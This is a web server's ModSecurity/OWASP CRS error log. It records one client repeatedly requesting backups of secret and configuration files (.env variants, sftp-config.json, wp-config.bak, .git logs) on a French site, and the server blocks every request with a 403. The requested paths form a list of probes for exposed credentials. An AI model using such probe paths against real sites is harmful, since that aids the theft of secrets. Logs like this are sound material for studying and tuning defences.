[Mon May 11 12:32:53.690692 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:42770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postman/.env.bak.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/postman/.env.bak.~"] [unique_id "agGwVZkIEwRJMyDaV55c6QAAAUQ"]
[Mon May 11 12:32:53.690901 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:42770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/postman/.env.bak.~"] [unique_id "agGwVZkIEwRJMyDaV55c6QAAAUQ"]
[Mon May 11 12:32:54.917405 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:42770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwVZkIEwRJMyDaV55c6QAAAUQ"]
[Mon May 11 12:33:02.353732 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:42848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env.copy.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/rest/.env.copy.~"] [unique_id "agGwXr4KNmD_mZ_vlf9IJAAAAEg"]
[Mon May 11 12:33:02.353950 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:42848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/rest/.env.copy.~"] [unique_id "agGwXr4KNmD_mZ_vlf9IJAAAAEg"]
[Mon May 11 12:33:03.745114 2026] [security2:error] [pid 1254242:tid 1254253] [client 185.177.72.9:42848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwXr4KNmD_mZ_vlf9IJAAAAEg"]
[Mon May 11 12:33:03.776937 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:60022] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env.copy.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/rest/.env.copy.~"] [unique_id "agGwX74KNmD_mZ_vlf9IJQAAAEo"]
[Mon May 11 12:33:03.777332 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:60022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/rest/.env.copy.~"] [unique_id "agGwX74KNmD_mZ_vlf9IJQAAAEo"]
[Mon May 11 12:33:05.021336 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:60022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwX74KNmD_mZ_vlf9IJQAAAEo"]
[Mon May 11 12:33:14.193453 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:62464] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json.~"] [unique_id "agGwamS6k_SCYd1AVZq-LQAAAQY"]
[Mon May 11 12:33:14.193835 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:62464] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json.~"] [unique_id "agGwamS6k_SCYd1AVZq-LQAAAQY"]
[Mon May 11 12:33:15.373185 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.177.72.9:62464] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwamS6k_SCYd1AVZq-LQAAAQY"]
[Mon May 11 12:33:15.400046 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:62470] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json.~"] [unique_id "agGwa5kIEwRJMyDaV55dAwAAAVg"]
[Mon May 11 12:33:15.400784 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:62470] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json.~"] [unique_id "agGwa5kIEwRJMyDaV55dAwAAAVg"]
[Mon May 11 12:33:16.613925 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:62470] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwa5kIEwRJMyDaV55dAwAAAVg"]
[Mon May 11 12:33:16.636759 2026] [security2:error] [pid 1254328:tid 1254344] [client 185.177.72.9:62484] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /shop/wp-config.bak.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/shop/wp-config.bak.~"] [unique_id "agGwbERdw2n9wv6Ai48WawAAAI0"]
[Mon May 11 12:33:16.637066 2026] [security2:error] [pid 1254328:tid 1254344] [client 185.177.72.9:62484] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/shop/wp-config.bak.~"] [unique_id "agGwbERdw2n9wv6Ai48WawAAAI0"]
[Mon May 11 12:33:18.840905 2026] [security2:error] [pid 1254328:tid 1254344] [client 185.177.72.9:62484] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwbERdw2n9wv6Ai48WawAAAI0"]
[Mon May 11 12:33:18.867413 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:62488] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /shop/wp-config.bak.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/shop/wp-config.bak.~"] [unique_id "agGwbmS6k_SCYd1AVZq-OwAAARQ"]
[Mon May 11 12:33:18.867620 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:62488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/shop/wp-config.bak.~"] [unique_id "agGwbmS6k_SCYd1AVZq-OwAAARQ"]
[Mon May 11 12:33:20.085870 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:62488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwbmS6k_SCYd1AVZq-OwAAARQ"]
[Mon May 11 12:33:20.111977 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:62500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env.prod~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/v1/.env.prod~"] [unique_id "agGwcEYQeUtAPynIs6xnmgAAAA4"]
[Mon May 11 12:33:20.112573 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:62500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/v1/.env.prod~"] [unique_id "agGwcEYQeUtAPynIs6xnmgAAAA4"]
[Mon May 11 12:33:21.264101 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:62500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwcEYQeUtAPynIs6xnmgAAAA4"]
[Mon May 11 12:33:21.288520 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:62502] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env.prod~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/v1/.env.prod~"] [unique_id "agGwcUYQeUtAPynIs6xnmwAAABA"]
[Mon May 11 12:33:21.288722 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:62502] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/v1/.env.prod~"] [unique_id "agGwcUYQeUtAPynIs6xnmwAAABA"]
[Mon May 11 12:33:22.501404 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:62502] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwcUYQeUtAPynIs6xnmwAAABA"]
[Mon May 11 12:33:22.526834 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:62518] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/remotes/origin/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agGwckRdw2n9wv6Ai48WewAAAJM"]
[Mon May 11 12:33:22.527233 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:62518] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agGwckRdw2n9wv6Ai48WewAAAJM"]
[Mon May 11 12:33:23.681394 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:62518] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwckRdw2n9wv6Ai48WewAAAJM"]
[Mon May 11 12:33:23.706815 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:39880] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/remotes/origin/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agGwcxjZymfuKpjWXeiLjQAAANI"]
[Mon May 11 12:33:23.707023 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:39880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/refs/remotes/origin/master"] [unique_id "agGwcxjZymfuKpjWXeiLjQAAANI"]
[Mon May 11 12:33:24.923135 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:39880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwcxjZymfuKpjWXeiLjQAAANI"]
[Mon May 11 12:33:24.954035 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:39882] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/remotes/origin/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agGwdGS6k_SCYd1AVZq-RwAAAQI"]
[Mon May 11 12:33:24.954546 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:39882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agGwdGS6k_SCYd1AVZq-RwAAAQI"]
[Mon May 11 12:33:26.119112 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:39882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwdGS6k_SCYd1AVZq-RwAAAQI"]
[Mon May 11 12:33:26.146098 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:39894] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/remotes/origin/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agGwdkYQeUtAPynIs6xnoQAAABg"]
[Mon May 11 12:33:26.146462 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:39894] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agGwdkYQeUtAPynIs6xnoQAAABg"]
